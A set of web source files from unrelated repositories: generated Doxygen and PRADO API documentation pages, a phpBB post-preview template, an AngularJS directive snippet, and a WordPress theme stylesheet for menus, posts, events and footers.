<p>Definition at line <a class="el" href="sx_8h_source.html#l00244">244</a> of file <a class="el" href="sx_8h_source.html">sx.h</a>.</p>
<p>Referenced by <a class="el" href="chain_8c_source.html#l00025">_sx_chain_io_plugin()</a>, <a class="el" href="chain_8c_source.html#l00089">_sx_chain_io_read()</a>, <a class="el" href="chain_8c_source.html#l00075">_sx_chain_io_write()</a>, <a class="el" href="chain_8c_source.html#l00050">_sx_chain_nad_plugin()</a>, <a class="el" href="chain_8c_source.html#l00116">_sx_chain_nad_read()</a>, and <a class="el" href="chain_8c_source.html#l00103">_sx_chain_nad_write()</a>.</p>
</div>
</div>
<a class="anchor" id="a35c6de41c3f7671d31831cffe854d671"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="sx_8h.html#ad00568cbae6611a54d3c33b8567b143b">_sx_chain_t</a> _sx_chain_st::wnext</td>
</tr>
</table>
</div><div class="memdoc">
<p>Definition at line <a class="el" href="sx_8h_source.html#l00246">246</a> of file <a class="el" href="sx_8h_source.html">sx.h</a>.</p>
<p>Referenced by <a class="el" href="chain_8c_source.html#l00025">_sx_chain_io_plugin()</a>, <a class="el" href="chain_8c_source.html#l00075">_sx_chain_io_write()</a>, <a class="el" href="chain_8c_source.html#l00050">_sx_chain_nad_plugin()</a>, <a class="el" href="chain_8c_source.html#l00103">_sx_chain_nad_write()</a>, and <a class="el" href="sx_8c_source.html#l00071">sx_free()</a>.</p>
</div>
</div>
<a class="anchor" id="a7901a791d86b2517142a2f8a093bab34"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="sx_8h.html#ad00568cbae6611a54d3c33b8567b143b">_sx_chain_t</a> _sx_chain_st::rnext</td>
</tr>
</table>
</div><div class="memdoc">
<p>Definition at line <a class="el" href="sx_8h_source.html#l00247">247</a> of file <a class="el" href="sx_8h_source.html">sx.h</a>.</p>
<p>Referenced by <a class="el" href="chain_8c_source.html#l00025">_sx_chain_io_plugin()</a>, <a class="el" href="chain_8c_source.html#l00089">_sx_chain_io_read()</a>, <a class="el" href="chain_8c_source.html#l00050">_sx_chain_nad_plugin()</a>, and <a class="el" href="chain_8c_source.html#l00116">_sx_chain_nad_read()</a>.</p>
</div>
</div>
<hr/>The documentation for this struct was generated from the following file:<ul>
<li>sx/<a class="el" href="sx_8h_source.html">sx.h</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.1.1
</small></address>
</body>
</html>
|
forum/styles/black_pearl/template/posting_preview.html | AlexBrown-appnovation/tcrg | <div><div class="tbl-h-l"><div class="tbl-h-r"><div class="tbl-h-c"><div class="tbl-title">{L_PREVIEW}</div></div></div></div>
<table class="tablebg" width="100%" cellpadding="0" cellspacing="0">
<tr><td class="row-post-top"><div style="float:right;"><span class="postdetails">{L_POST_SUBJECT}: {PREVIEW_SUBJECT}</span></div>{MINI_POST_IMG} <span class="postdetails">{L_POSTED}: {POST_DATE}</span></td></tr>
<!-- IF S_HAS_POLL_OPTIONS -->
<tr>
<td class="row2" align="center"><br clear="all" />
<table cellspacing="0" cellpadding="4" border="0" align="center">
<tr><td align="center"><span class="gen"><b>{POLL_QUESTION}</b></span><br /><span class="gensmall">{L_POLL_LENGTH}</span></td></tr>
<tr>
<td align="center">
<table cellspacing="0" cellpadding="2" border="0">
<!-- BEGIN poll_option -->
<tr>
<td>
<!-- IF S_IS_MULTI_CHOICE -->
<input type="checkbox" class="radio" name="vote_id" value="" />
<!-- ELSE -->
<input type="radio" class="radio" name="vote_id" value="" />
<!-- ENDIF -->
</td>
<td><span class="gen">{poll_option.POLL_OPTION_CAPTION}</span></td>
</tr>
<!-- END poll_option -->
</table>
</td>
</tr>
<tr><td align="center"><span class="gensmall">{L_MAX_VOTES}</span></td></tr>
</table>
</td>
</tr>
<!-- ENDIF -->
<tr>
<td class="row-post-body">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<div class="postbody">{PREVIEW_MESSAGE}</div>
<!-- IF .attachment -->
<br clear="all" /><br />
<table class="tablebg" width="100%" cellpadding="0" cellspacing="0">
<tr><th>{L_ATTACHMENTS}</th></tr>
<!-- BEGIN attachment -->
<tr><td class="row2">{attachment.DISPLAY_ATTACHMENT}</td></tr>
<!-- END attachment -->
</table>
<!-- ENDIF -->
<!-- IF PREVIEW_SIGNATURE --><div class="postbody"><br />_________________<br />{PREVIEW_SIGNATURE}</div><!-- ENDIF --></td>
</tr>
</table>
</td>
</tr>
<tr><td class="spacer"><img src="{T_THEME_PATH}/images/spacer.gif" width="1" height="4" alt="" /></td></tr>
<tr><td class="cat-bottom"> </td></tr>
</table>
<div class="tbl-f-l"><div class="tbl-f-r"><div class="tbl-f-c"> </div></div></div></div>
<br clear="all" /> |
ReportToMe.Web/Directives/Meeting.html | romage/ReportToMe | <div class="row">
<div class='col-md-6'>{{ meeting.description }}</div>
<div class='col-md-3'>{{ meeting.meetingDate }}</div>
<div class='col-md-1'>{{ meeting.meetingUpdates.length }}</div>
<div class="col-md-2"><a href='/#/Meetings/Details/{{meeting.id}}'>Details</a></div>
</div> |
wp-content/themes/circulo_podemos/css/modules.css | podemosfrance/podemosfrance.info | /*
* MAIN HEADER
* ============================ */
#main_header{
background-repeat: no-repeat;
background-position:center;
overflow: hidden;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
overflow: visible;
z-index: 3;
position: relative;
}
#main_header h1 a{
font-size: 50px;
font-family: 'open_sans-extrabold';
text-transform: uppercase;
color: #fff;
display: block;
text-align: center;
padding: 50px 0;
text-shadow: 0 1px 1px rgba(0,0,0,0.5)
}
/*
* MAIN MENU
* ============================ */
.nav_container{
background-color: #4B244C;
border-top: 1px solid #381939;
position: relative;
overflow: visible;
}
.nav_container .main_nav {
margin-right: 50px;
}
.nav_container .main_nav .menu > li{
float: left;
}
.nav_container .main_nav .menu > li:first-child{
border-left: 1px solid #381939;
}
.nav_container .main_nav .menu > li:last-child{
border-right: 1px solid #583159;
}
.nav_container .main_nav .menu > li > a{
border-right: 1px solid #381939;
border-left: 1px solid #583159;
background-color: #4B244C;
font-size: 15px;
color: #fff;
display: inline-block;
vertical-align: top;
padding: 15px 15px;
text-transform: uppercase;
font-family: 'open_sans-semibold';
-webkit-transition: background-color 200ms ease-in-out;
-moz-transition: background-color 200ms ease-in-out;
-ms-transition: background-color 200ms ease-in-out;
-o-transition: background-color 200ms ease-in-out;
transition: background-color 200ms ease-in-out;
}
.menu-item-has-children ul{
margin-top: -6px;
display: none;
z-index: 2;
border-radius: 0 0 2px 2px;
overflow: hidden;
border-top: 4px solid #391D3A;
background: #432244;
}
.menu-item-has-children:hover ul{
display: block;
}
.nav_container .main_nav .menu > li > a:hover,
.nav_container .main_nav .menu .current-menu-item > a{
background-color: #5D255E;
}
.login{
line-height: 55px;
color: #fff;
font-size: 31px;
padding: 0 10px;
position: absolute;
right: 0;
}
#search{
color: #fff;
font-size: 27px;
padding: 0 10px;
position: absolute;
top: 10px;
right: 50px;
}
/*
* SUBMENU
* ============================ */
.sub-menu{
position: absolute;
top: 57px;
left: 0;
z-index: 1;
background: #391D3A;
width: 100%;
}
.sub-menu li {
float: left;
}
.sub-menu li:first-child a{
border-top:0;
}
.sub-menu li:last-child a{
border-bottom:0;
}
.sub-menu a {
display: block;
border-left: 1px solid #59265A;
border-right: 1px solid #371A38;
font-weight: bold;
padding: 16px 14px;
color: #A0A4A9;
text-transform: uppercase;
font-size: 12px;
-webkit-transition: color 200ms ease-in-out;
-moz-transition: color 200ms ease-in-out;
-ms-transition: color 200ms ease-in-out;
-o-transition: color 200ms ease-in-out;
transition: color 200ms ease-in-out;
}
.sub-menu a:hover{
color: #fff;
}
.sub-menu .sub-menu{
display: none !important;
}
/*
* SELECT MENU
* ============================ */
#menu-select-menu{
display: none;
width: 100%;
}
/*
* SEARCH FORM
* ============================ */
#searchform_container{
background: #391d3a;
padding-bottom: 4px;
position: absolute;
width: 100%;
padding: 10px;
z-index: 2;
top: 213px;
-webkit-transition: top 200ms ease-in-out;
-moz-transition: top 200ms ease-in-out;
-ms-transition: top 200ms ease-in-out;
-o-transition: top 200ms ease-in-out;
transition: top 200ms ease-in-out;
}
.admin-bar #searchform_container{
top:244px;
}
#searchform_container.open{
top: 266px;
}
.admin-bar #searchform_container.open{
top: 298px;
}
#searchform {
width: 1000px;
margin: 0 auto;
}
#searchform input[type=text]{
border: none;
text-indent: 10px;
font-size: 16px;
padding: 7px;
font-family: 'open_sans-italic';
width: 100%;
background: transparent;
border: 1px solid #583159;
color: #fff;
}
#searchform input[type=submit]{
display: none;
}
/*
* CALL TO ACTION
* ============================ */
.call_to_action{
text-align: center;
margin: 55px 0 0;
}
.call_to_action .circulo {
font-size: 70px;
background-color: #612D62;
width: 170px;
height: 170px;
border-radius: 85px;
display: inline-block;
text-align: center;
color: #fff;
line-height: 170px;
-webkit-transition: background-color 200ms ease-in-out;
-moz-transition: background-color 200ms ease-in-out;
-ms-transition: background-color 200ms ease-in-out;
-o-transition: background-color 200ms ease-in-out;
transition: background-color 200ms ease-in-out;
}
.call_to_action > div{
display: inline-block;
vertical-align: top;
margin: 0 35px;
text-align: center;
}
.call_to_action h2 a{
padding: 15px 0;
font-size: 25px;
text-transform: uppercase;
color: #612D62;
font-family: 'open_sans-semibold';
display: block;
text-align: center;
}
.call_to_action .circulo:hover{
background-color: #744175
}
/*
* LAST POST
* ============================ */
.last_post{
margin: 15px 0;
}
.last_post header figure {
width: 466px;
height: 254px;
position: relative;
}
.last_post header figure a{
position: absolute;
width: 100%;
height: 100%;
}
.last_post header figure img{
width: 466px;
height: 254px;
}
.last_post .post{
width: 466px;
height: 510px;
margin: 0 15px;
display: inline-block;
vertical-align: top;
position: relative;
}
.last_post h2 {
margin-bottom: 10px;
}
.last_post h2 a{
height: 90px;
}
.last_post .post .post_author{
padding: 10px 0;
height: 60px;
margin: 10px 0;
}
.last_post .post .post_author figure,
.last_post .post .post_author figure img{
width: 40px;
height: 40px;
border-radius: 20px;
}
.last_post .post .post_author h4 a{
display: inline-block;
vertical-align: top;
line-height: 40px;
}
.last_post .post .post_author time{
top: 20px;
}
/*
* POST CATEGORY
* ============================ */
.post .category{
background-color: #4B244C;
color: #fff;
font-family: 'open_sans-semibold';
display: inline-block;
position: absolute;
left: 10px;
top: 10px;
border-bottom: 4px solid #391D3A;
padding: 5px 10px;
font-size: 16px;
-webkit-transition: background-color 200ms ease-in-out;
-moz-transition: background-color 200ms ease-in-out;
-ms-transition: background-color 200ms ease-in-out;
-o-transition: background-color 200ms ease-in-out;
transition: background-color 200ms ease-in-out;
}
.post .category:hover{
background-color: #391D3A;
}
/*
* POST
* ============================ */
.post header{
position: relative;
}
.post h2{
font-size: 31px;
line-height: 45px;
margin-bottom: 0px;
font-family: 'open_sans-light';
}
.post h2 a{
display: block;
}
.post .excerpt{
font-family: 'open_sans-semibold';
}
#detail .post header figure img,
#detail .post header figure{
width: 629px;
height: 343px;
}
#detail .post h2 {
margin-bottom: 20px;
}
/*
* POST AUTHOR
* ============================ */
.post_author{
padding: 20px 0;
position: relative;
height: 110px;
}
.post_author figure,
.post_author h4,
.post_author p{
display: inline-block;
vertical-align: middle;
margin: 0;
font-family: 'open_sans-italic';
}
.post_author figure{
float: left;
width:70px;
height:70px;
background: url('../img/thumbnail_person.jpg') no-repeat center;
background-size: 100%;
border-radius: 35px;
overflow: hidden;
margin-right: 10px;
}
.post_author figure img{
width:70px;
height:70px;
border-radius: 35px;
margin: 0 10px 10px 0;
}
.post_author h4{
margin-right: 20px;
}
.post_author h4 a{
color: #A2A2A2;
font-family: 'open_sans-italic';
line-height: 70px;
}
.post_author h4 span{
line-height: 40px;
}
.post_author .twitter a::before{
color: #A2A2A2;
font-size: 21px;
margin-right: 3px;
font-style: normal;
position: relative;
top: 3px;
}
.post_author .twitter a{
font-family: 'open_sans-italic';
}
.post_author h4 a span,
.post_author .twitter a{
color: #612D62;
}
.post_author h4 a span{
margin-right: 5px;
}
.post_author time{
color: #A2A2A2;
font-family: 'open_sans-italic';
font-size: 16px;
position: absolute;
right: 0;
top: 45px;
}
/*
* POST TAG
* ============================ */
.post_tags a{
padding: 10px;
display: inline-block;
border: 2px solid #612D62;
margin: 7px 14px 7px 0;
background-color: #fff;
font-size: 15px;
-webkit-transition: all 200ms ease-in-out;
-moz-transition: all 200ms ease-in-out;
-ms-transition: all 200ms ease-in-out;
-o-transition: all 200ms ease-in-out;
transition: all 200ms ease-in-out;
}
.post_tags a:hover{
background-color: #612D62;
color: #fff;
}
/*
* POST TEXT
* ============================ */
.post_text {
text-align: justify;
}
/*
* WIDGET
* ============================ */
.widget {
margin: 0 0 20px 0;
border-bottom: 1px solid #f2f2f2;
padding: 0 0 20px 0;
font-size: 21px;
}
.widget:last-child {
border-bottom: none;
}
.widget ul li:nth-child(odd) a{
background-color: #f2f2f2;
}
.widget li a{
padding: 10px;
font-size: 18px;
display: block;
background: #fff
-webkit-transition: background-color 200ms ease-in-out;
-moz-transition: background-color 200ms ease-in-out;
-ms-transition: background-color 200ms ease-in-out;
-o-transition: background-color 200ms ease-in-out;
transition: background-color 200ms ease-in-out;
}
.widget li a:hover,
.widget ul li:nth-child(odd) a:hover{
background-color: #e7e7e7;
}
.widget .textwidget{
font-size: 14px;
}
/*
* COMMENTS
* ============================ */
#commentform input[type="text"],
#commentform input[type="email"],
#commentform input[type="password"]{
background: #f5f5f5;
border: 1px solid #bababa;
padding: 5px;
width: 100%;
margin: 0 0 5px;
}
#commentform textarea{
display: block;
border: 1px solid #bababa;
background: #f2f2f2;
width: 100%;
margin: 0 0 5px;
}
#commentform a{
text-decoration: underline;
font-family: 'open_sans-semibold';
}
.pages_navigation {
text-align: center;
}
.pages_navigation a {
margin: 5px;
display: inline-block;
font-size: 14px;
border: 1px solid #1a1a1a;
padding: 10px;
-webkit-transition: background 0.3s, -webkit-transform 0.3s;
-moz-transition: background 0.3s, -moz-transform 0.3s;
transition: background 0.3s, transform 0.3s;
}
.pages_navigation a:hover {
background:#1a1a1a;
color:#fff;
}
#comments h2{
font-size: 21px;
}
#comments ol{
margin: 0;
padding: 0;
}
#comments ol li{
padding: 10px;
border-bottom: 1px solid #dadada;
border-top: 1px solid #fff;
}
#comments ol li:nth-child(odd){
background: #f2f2f2;
}
#comments ol article > img{
float: left;
margin: 10px 10px 10px 0;
border-radius: 48px;
}
#comments ol time a{
font-size: 16px;
font-family: 'open_sans-semibold';
}
#comments ol h4,
#comments ol time,
#comments ol p{
margin-left: 105px;
margin-bottom: 10px;
display: block;
}
/*
* GOOGLE MAPS
* ============================ */
.acf-map {
width: 100%;
height: 400px;
border: #ccc solid 1px;
margin: 10px 0;
}
/*
* LAST ORGANIZATIONS
* ============================ */
.last_organizations{
text-align: center;
}
.last_organizations .organization{
padding: 20px 0;
margin: 0 28px;
width: 440px;
text-align: center;
display: inline-block;
vertical-align: top;
height: 510px;
}
/*
* ORGANIZATION
* ============================ */
.organization{
padding: 20px 0;
}
.organization figure{
background: url("../img/thumbnail_org.jpg") no-repeat center;
background-size: 100%;
overflow: hidden;
width: 240px;
height: 240px;
display: block;
margin: 0 auto;
border-radius: 200px;
border: 10px solid #612D62;
box-shadow: 0 0 2px 2px rgba(0,0,0,0.1);
}
.organization figure img{
width: 240px;
height: 240px;
}
.organization h2{
padding: 15px 0;
font-size: 35px;
color: #612D62;
font-family: 'open_sans-extrabold';
display: block;
text-align: center;
}
.organization h2 a{
font-family: 'open_sans-semibold';
}
.organization .social_profiles{
border-top: 1px solid #f2f2f2;
padding-top: 20px;
margin: 0px auto 20px;
width: 250px;
display: block;
text-align: center;
}
.organization .social_profiles a{
font-size: 35px;
margin: 0 4px;
}
.organization h3{
padding: 15px 0;
font-size: 25px;
color: #612D62;
}
/*
* LAST PERSONS
* ============================ */
.last_persons{
text-align: center;
}
.last_persons .person{
padding: 20px 0;
margin: 0 8px;
width: 230px;
display: inline-block;
vertical-align: top;
height: 510px;
text-align: center;
}
/*
* PERSON
* ============================ */
.person{
padding: 20px 0;
}
.person figure{
background: url("../img/thumbnail_person.jpg") no-repeat center;
background-size: 100%;
overflow: hidden;
width: 200px;
height: 200px;
display: block;
margin: 0 auto;
border-radius: 100px;
border: 10px solid #612D62;
box-shadow: 0 0 2px 2px rgba(0,0,0,0.1);
}
.person figure img{
width: 200px;
height: 200px;
}
.person h2{
padding: 15px 0;
font-size: 25px;
color: #612D62;
font-family: 'open_sans-extrabold';
display: block;
text-align: center;
}
.person h2 a{
font-family: 'open_sans-semibold';
}
.person .social_profiles{
padding-top: 20px;
margin: 0px auto 20px;
width: 170px;
display: block;
text-align: center;
}
.person .social_profiles a{
font-size: 35px;
margin: 0 4px;
}
.person h3{
padding: 15px 0;
font-size: 25px;
color: #612D62;
text-align: center;
}
/*
* LAST EVENTS
* ============================ */
.last_events {
margin: 15px 0;
}
.last_events .post.event{
padding:10px;
height: 185px;
}
.last_events .post.event:nth-child(even){
background:#f2f2f2;
}
.last_events .event_text,
.last_events .event_text p{
margin: 0;
font-size: 15px;
}
/*
* EVENT
* ============================ */
.last_events .post.event figure{
float:left;
width:300px;
height:164px;
margin-right:20px;
}
.last_events .post.event figure img{
width:300px;
height:164px;
}
.post.event .event_info{
border-top:1px solid #ddd;
padding: 10px 0;
font-size: 14px;
}
.last_events .post.event h2,
.last_events .post.event .event_info,
.last_events .post.event .even_text{
margin: 0 0 13px 320px;
}
.last_events .post.event h2 a{
font-size: 27px;
display: block;
margin-bottom: 6px;
line-height: 31px;
}
.event_info .icon::before{
color: #612D62;
margin-right: 3px;
position: relative;
top: 1px;
}
.post.event .event_info > time,
.post.event .event_info > a,
.post.event .event_info address{
margin-right:8px;
color: #612D62;
}
.event_info address .icon::before{
position:absolute;
left:0;
top: 2px;
}
.event_info address{
text-align: left;
display: inline-block;
vertical-align: top;
font-size:14px;
position: relative;
padding-left: 21px;
margin-left: 10px;
}
/*
* CONTACT INFO
* ============================ */
.contact_info .icon::before{
color: #612D62;
margin-right: 8px;
font-size: 18px;
position: relative;
top: 3px;
}
#main_footer .contact_info .icon::before {
color:#A2A2A2;
font-style: normal;
}
.contact_info address span,
.contact_info address p,
.contact_info .direct_contact{
margin: 0 0 0 26px;
}
.contact_info address p span,
.contact_info address,
.contact_info .direct_contact{
display: inline-block;
vertical-align: top;
/* margin: 0; */
}
.contact_info address > span:first-child,
.contact_info address p span{
margin: 5px 0;
}
.contact_info .icon{
margin: 5px 0 9px;
display: block;
color: #333;
}
#main_footer .contact_info .icon,
#main_footer .contact_info span{
color: #A0A4A9;
font-size: 14px;
line-height: 12px;
font-style: italic;
}
/*
* REDES SOCIALES CÍRCULO
* ============================ */
.rrss-circulo{
position: absolute;
right: 0;
top: 0;
}
.rrss-circulo li {
display: inline-block;
vertical-align: top;
}
.rrss-circulo li a::before{
font-size: 25px;
color: #A0A4A9;
margin: 0 4px;
}
.rrss-circulo li a{
width: 25px;
height: 25px;
display: inline-block;
vertical-align: top;
margin: 0 3px;
opacity: 1;
-webkit-transition: opacity 200ms ease-in-out;
-moz-transition: opacity 200ms ease-in-out;
-ms-transition: opacity 200ms ease-in-out;
-o-transition: opacity 200ms ease-in-out;
transition: opacity 200ms ease-in-out;
}
.rrss-circulo li a:hover{
opacity: 0.7;
}
/*
* MAIN FOOTER
* ============================ */
#main_footer{
background: #2C2F36;
color: #A0A4A9;
padding: 10px 0 5px;
border-top: 4px solid #D1D1D1;
position: relative;
}
#main_footer h1 a{
color: #fff;
font-family: 'open_sans-extrabold', sans-serif;
font-size: 24px;
margin-bottom: 5px;
display: block;
}
#main_footer .legal{
text-align: right;
}
#main_footer .legal a{
display: inline-block;
vertical-align: top;
margin: 0 5px;
color: #A0A4A9;
text-transform: uppercase;
font-size: 12px;
-webkit-transition: color 200ms ease-in-out;
-moz-transition: color 200ms ease-in-out;
-ms-transition: color 200ms ease-in-out;
-o-transition: color 200ms ease-in-out;
transition: color 200ms ease-in-out;
}
#main_footer .legal a:hover {
color: #FFF;
}
/*
* FORMULARIO CONTACTO
* ============================ */
.wpcf7-form input[type="text"],
.wpcf7-form input[type="email"],
.wpcf7-form textarea{
border: 1px solid #DADADA;
display: block;
width: 100%;
border:none;
background: #f5f5f5;
padding: 15px
}
.wpcf7-form input,
.wpcf7-form textarea{
border:none;
font-size: 1.1em
}
.wpcf7-form-control-wrap {
display: block !important;
}
.wpcf7-not-valid-tip {
background: #C90F0F;
color: #fff !important;
font-weight: bold;
padding: 10px 15px;
}
.wpcf7-mail-sent-ok {
background: #579da5;
border: 0px !important;
font-weight: bold;
text-align: center;
color: #fff;
padding: 10px !important;
}
.wpcf7-form.sent > p {
display: none;
}
.wpcf7-form input[type="submit"]{
}
.input-custom_type {
width: 100%;
line-height: 30px;
margin: 10px 0;
}
/*
* COMPARTIR NOTICIA
* ============================ */
.share{
text-align: center;
padding: 30px 0 40px;
}
.stButton .stButton_gradient,
.stButton .stFb,
.stButton .stTwbutton,
.stButton .stMainServices{
height: 22px !important;
}
/*
* MENSAJE DE COOKIES
* ============================ */
.wrapperMensajeCookie{
top:0;
bottom: auto;
}
|
frameworks/prado/docs/manual/class-TRpcClientRequestException.html | tejdeeps/tejcs.com | <!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="generator" content="ApiGen 2.8.0" />
<meta http-equiv="content-language" content="en" />
<meta name="Keywords" content="PRADO PHP framework component template delphi asp.net event property OOP PHP5 object oriented programming Web programming development" />
<meta name="Description" content="PRADO is a component-based and event-driven framework for Web application development in PHP 5." />
<meta name="Author" content="Qiang Xue" />
<meta name="Subject" content="Web programming, PHP framework" />
<meta name="Language" content="en" />
<link rel="Shortcut Icon" href="/favicon.ico" />
<link rel="stylesheet" type="text/css" href="/css/style.css" />
<link rel="stylesheet" type="text/css" href="/css/manual.css" />
<title>Class TRpcClientRequestException | PRADO v3.2.4 API Manual</title>
<script type="text/javascript" src="resources/combined.js?493275287"></script>
<script type="text/javascript" src="elementlist.js?2131753225"></script>
<link rel="stylesheet" type="text/css" media="all" href="resources/style.css?356060597" />
</head>
<body>
<div id="page">
<div id="header">
<div id="logo"><img src="/css/pradoheader.gif" alt="PRADO Component Framework for PHP 5" /></div>
<div id="mainmenu">
<ul>
<li><a href="/">Home</a></li>
<li><a href="/about/" >About</a></li>
<li><a href="/testimonials/" >Testimonials</a></li>
<li><a href="/demos/" >Demos</a></li>
<li><a href="/download/" >Download</a></li>
<li><a href="/documentation/" class="active">Documentation</a></li>
<li><a href="/forum/" >Forum</a></li>
<li><a href="http://github.com/pradosoft/prado">Development</a></li>
</ul>
</div><!-- mainmenu -->
</div><!-- header -->
<div id="main">
<div id="navbar">
<ul>
<li><a href="/tutorials/">Tutorials</a></li>
<li><a href="/docs/classdoc/">Class Docs</a></li>
<li><a href="/docs/manual/" class="active">API Manual</a></li>
<li><a href="/wiki/">Wiki</a></li>
</ul>
</div>
<table id="maintable">
<tr>
<td id="left">
<div id="menu">
<div id="groups">
<h3>Packages</h3>
<ul>
<li><a href="package-None.html">None</a>
</li>
<li class="active"><a href="package-System.html">System<span></span></a>
<ul>
<li><a href="package-System.Caching.html">Caching</a>
</li>
<li><a href="package-System.Collections.html">Collections</a>
</li>
<li><a href="package-System.Data.html">Data<span></span></a>
<ul>
<li><a href="package-System.Data.ActiveRecord.html">ActiveRecord<span></span></a>
<ul>
<li><a href="package-System.Data.ActiveRecord.Relations.html">Relations</a>
</li>
<li><a href="package-System.Data.ActiveRecord.Scaffold.html">Scaffold<span></span></a>
<ul>
<li><a href="package-System.Data.ActiveRecord.Scaffold.InputBuilder.html">InputBuilder</a>
</li>
</ul></li></ul></li>
<li><a href="package-System.Data.Commom.html">Commom<span></span></a>
<ul>
<li><a href="package-System.Data.Commom.Sqlite.html">Sqlite</a>
</li>
</ul></li>
<li><a href="package-System.Data.Common.html">Common<span></span></a>
<ul>
<li><a href="package-System.Data.Common.Mssql.html">Mssql</a>
</li>
<li><a href="package-System.Data.Common.Mysql.html">Mysql</a>
</li>
<li><a href="package-System.Data.Common.Oracle.html">Oracle</a>
</li>
<li><a href="package-System.Data.Common.Pgsql.html">Pgsql</a>
</li>
<li><a href="package-System.Data.Common.Sqlite.html">Sqlite</a>
</li>
</ul></li>
<li><a href="package-System.Data.DataGateway.html">DataGateway</a>
</li>
<li><a href="package-System.Data.SqlMap.html">SqlMap<span></span></a>
<ul>
<li><a href="package-System.Data.SqlMap.Configuration.html">Configuration</a>
</li>
<li><a href="package-System.Data.SqlMap.Statements.html">Statements</a>
</li>
</ul></li></ul></li>
<li><a href="package-System.Exceptions.html">Exceptions</a>
</li>
<li><a href="package-System.I18N.html">I18N</a>
</li>
<li><a href="package-System.IO.html">IO</a>
</li>
<li><a href="package-System.Security.html">Security</a>
</li>
<li class="active"><a href="package-System.Util.html">Util</a>
</li>
<li><a href="package-System.Web.html">Web<span></span></a>
<ul>
<li><a href="package-System.Web.Javascripts.html">Javascripts</a>
</li>
<li><a href="package-System.Web.Services.html">Services</a>
</li>
<li><a href="package-System.Web.UI.html">UI<span></span></a>
<ul>
<li><a href="package-System.Web.UI.ActiveControls.html">ActiveControls</a>
</li>
<li><a href="package-System.Web.UI.WebControls.html">WebControls</a>
</li>
</ul></li></ul></li>
<li><a href="package-System.Xml.html">Xml</a>
</li>
</ul></li>
<li><a href="package-Wsat.html">Wsat<span></span></a>
<ul>
<li><a href="package-Wsat.pages.html">pages</a>
</li>
</ul></li>
</ul>
</div>
</div>
</div>
</td>
<td id="right">
<div id="rightInner">
<form id="search">
<input type="hidden" name="cx" value="" />
<input type="hidden" name="ie" value="UTF-8" />
<input type="text" name="q" class="text" />
<input type="submit" value="Search" />
</form>
<div id="navigation">
<ul>
<li>
<a href="index.html" title="Overview"><span>Overview</span></a>
</li>
<li>
<a href="package-System.Util.html" title="Summary of System\Util"><span>Package</span></a>
</li>
<li class="active">
<span>Class</span> </li>
</ul>
<ul>
<li>
<a href="tree.html" title="Tree view of classes, interfaces, traits and exceptions"><span>Tree</span></a>
</li>
<li>
<a href="deprecated.html" title="List of deprecated elements"><span>Deprecated</span></a>
</li>
<li>
<a href="todo.html" title="Todo list"><span>Todo</span></a>
</li>
</ul>
<ul>
</ul>
</div>
<div id="content" class="class">
<h1>Class TRpcClientRequestException</h1>
<div class="description">
<p>TRpcClientRequestException class</p>
<p>This Exception is fired if the RPC request fails because of transport
problems e.g. when there is no RPC server responding on the given remote
host.</p>
</div>
<dl class="tree">
<dd style="padding-left:0px">
Exception
</dd>
<dd style="padding-left:30px">
<img src="resources/inherit.png" alt="Extended by" />
<a href="class-TException.html"><span>TException</span></a>
</dd>
<dd style="padding-left:60px">
<img src="resources/inherit.png" alt="Extended by" />
<a href="class-TApplicationException.html"><span>TApplicationException</span></a>
</dd>
<dd style="padding-left:90px">
<img src="resources/inherit.png" alt="Extended by" />
<b><span>TRpcClientRequestException</span></b>
</dd>
</dl>
<div class="info">
<b>Package:</b> <a href="package-System.html">System</a>\<a href="package-System.Util.html">Util</a><br />
<b>Copyright:</b>
2010 Bigpoint GmbH<br />
<b>License:</b>
<a href="http://www.pradosoft.com/license/">http://www.pradosoft.com/license/</a><br />
<b>Author:</b>
Robin J. Rogge <<a
href="mailto:rrogge@bigpoint.net">rrogge@<!-- -->bigpoint.net</a>><br />
<b>Version:</b>
$Id$<br />
<b>Since:</b>
3.2<br />
<b>Located at</b> Util/TRpcClient.php<br />
</div>
<table class="summary inherited">
<caption>Methods inherited from <a href="class-TException.html#methods">TException</a></caption>
<tr>
<td><code>
<a href="class-TException.html#___construct">__construct()</a>,
<a href="class-TException.html#_getErrorCode">getErrorCode()</a>,
<a href="class-TException.html#_getErrorMessage">getErrorMessage()</a>,
<a href="class-TException.html#_getErrorMessageFile">getErrorMessageFile()</a>,
<a href="class-TException.html#_setErrorCode">setErrorCode()</a>,
<a href="class-TException.html#_setErrorMessage">setErrorMessage()</a>,
<a href="class-TException.html#_translateErrorMessage">translateErrorMessage()</a>
</code></td>
</tr>
</table>
<table class="summary inherited">
<caption>Methods inherited from Exception</caption>
<tr>
<td><code>
__toString(),
getCode(),
getFile(),
getLine(),
getMessage(),
getPrevious(),
getTrace(),
getTraceAsString()
</code></td>
</tr>
</table>
<table class="summary inherited">
<caption>Properties inherited from <a href="class-TException.html#properties">TException</a></caption>
<tr>
<td><code>
<a href="class-TException.html#$_messageCache"><var>$_messageCache</var></a>
</code></td>
</tr>
</table>
<table class="summary inherited">
<caption>Properties inherited from Exception</caption>
<tr>
<td><code>
<var>$code</var>,
<var>$file</var>,
<var>$line</var>,
<var>$message</var>
</code></td>
</tr>
</table>
</div>
</div>
</td>
</tr>
</table>
</div><!-- main -->
<div id="footer">
<a href="/tos/">Terms of Service</a> |
<a href="/support/">Contact Us</a>
<br />
PRADO v3.2.4 API Manual API documentation generated by <a href="http://apigen.org">ApiGen 2.8.0</a>
<br />Copyright © 2006-2014 by the PRADO Group.<br />
<a title="Powered by PRADO" href="http://www.pradosoft.com/"><img src="http://www.pradosoft.com/images/powered2.gif" style="border-width:0px;" alt="Powered by PRADO" /></a>
</div>
</div><!-- page -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-186303-3";
urchinTracker();
</script>
</body>
</html>
|
backups/31July2015_index2.html | reddhound/reddhound.github.io |
<!DOCTYPE HTML>
<html lang="en">
